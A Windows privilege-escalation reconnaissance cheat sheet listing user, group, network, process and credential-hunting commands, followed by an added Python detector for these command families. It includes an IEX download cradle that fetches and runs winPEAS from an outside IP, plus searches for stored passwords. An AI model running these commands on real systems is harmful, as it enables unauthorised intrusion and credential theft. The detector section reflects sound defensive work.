Situational Awareness

This section lists basic commands for gathering enough information about the current host, user and network context to decide how privilege escalation might be attempted.

Current User

Privileges

whoami /priv

Group Membership

whoami /groups

Command History

Get-History
(Get-PSReadlineOption).HistorySavePath

Saved Credentials

cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Users

cmd.exe

net user
net user /domain
net user cub3 /domain

powershell.exe

Get-LocalUser
Get-LocalUser cub3

Groups

cmd.exe

net localgroup
net localgroup Administrators
net group /domain
net group "Domain Admins" /domain

powershell.exe

Get-LocalGroup
Get-LocalGroupMember Administrators

System Information

systeminfo

Network Information

ipconfig /all
route print
netstat -aon
netstat -a -p tcp | findstr LISTENING

Processes

cmd.exe

tasklist
wmic process list
wmic process get ProcessID,ExecutablePath,Commandline /format:list

powershell.exe

Get-Process
Get-WMIObject -Class Win32_Process

Installed Programs

32-bit

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64-bit

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Files

findstr /si password *.txt *.config *.yaml
Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.kdbx,*.config -File -Recurse -ErrorAction SilentlyContinue

winPEAS

IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.161/winPEAS.ps1")
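A defender-side complement to the command list above, added here as an example and not part of the original cheat sheet: a small Python detector that classifies process-creation command lines into the enumeration families listed on this page and flags a user who runs several distinct families within a short window, or who runs a download cradle like the winPEAS line at all. The family names, the 5-minute window and the threshold of three families are my assumptions, and the log records are constructed in a simplified 'ISO-timestamp|user|command line' shape rather than taken from a real Sysmon or 4688 export.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command families from the cheat sheet above, matched case-insensitively against a process command line.
DISCOVERY_PATTERNS = {
    "privilege_enum": re.compile(r'\bwhoami(\.exe)?"?\s+/(priv|groups)\b', re.I),
    "account_enum": re.compile(r"\bnet1?(\.exe)?\s+(user|group|localgroup)\b|\bget-local(user|group)", re.I),
    "credential_enum": re.compile(r"\bcmdkey(\.exe)?\s+/list\b|currentversion\\winlogon", re.I),
    "host_network_enum": re.compile(r"\bsysteminfo\b|\bipconfig\s+/all\b|\broute\s+print\b|\bnetstat\b", re.I),
    "process_enum": re.compile(r"\btasklist\b|\bwmic\s+process\b|win32_process", re.I),
    "file_hunt": re.compile(r"\bfindstr\s+/si\s+password\b|\*\.kdbx", re.I),
    "download_cradle": re.compile(r"\biex\b.*downloadstring|net\.webclient", re.I),
}

def classify(cmdline):  # set of discovery families a command line matches
    return {name for name, pat in DISCOVERY_PATTERNS.items() if pat.search(cmdline)}
def parse_event(line):  # constructed 'ISO-timestamp|user|command line' record (assumed format)
    ts, user, cmd = line.split("|", 2)
    return datetime.fromisoformat(ts), user, cmd
def find_discovery_bursts(lines, window=timedelta(minutes=5), min_families=3):
    """Return {user: sorted families} for users running >= min_families families in `window`, or any download cradle."""
    by_user = defaultdict(list)
    for line in lines:
        ts, user, cmd = parse_event(line)
        if families := classify(cmd):
            by_user[user].append((ts, families))
    alerts = {}
    for user, events in by_user.items():
        events.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(events):  # sliding window starting at each matching event
            seen = set()
            for ts, families in events[i:]:
                if ts - start > window:
                    break
                seen |= families
            if len(seen) >= min_families or "download_cradle" in seen:
                alerts[user] = sorted(seen)
                break
    return alerts

SAMPLE_LOG = [  # constructed records, not real telemetry; <host> is a placeholder
    "2024-03-01T09:00:05|CORP\\alice|\"C:\\Windows\\System32\\whoami.exe\" /priv",
    "2024-03-01T09:00:31|CORP\\alice|net user /domain",
    "2024-03-01T09:01:10|CORP\\alice|cmdkey /list",
    "2024-03-01T09:02:44|CORP\\alice|netstat -aon",
    "2024-03-01T09:30:00|CORP\\bob|ipconfig /all",
    "2024-03-01T10:15:00|CORP\\bob|tasklist",
    "2024-03-01T11:00:00|CORP\\carol|powershell -c IEX (New-Object Net.WebClient).DownloadString('http://<host>/winPEAS.ps1')",
]
```

Running `find_discovery_bursts(SAMPLE_LOG)` flags alice (four families inside five minutes) and carol (download cradle) but not bob, whose two commands are 45 minutes apart.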
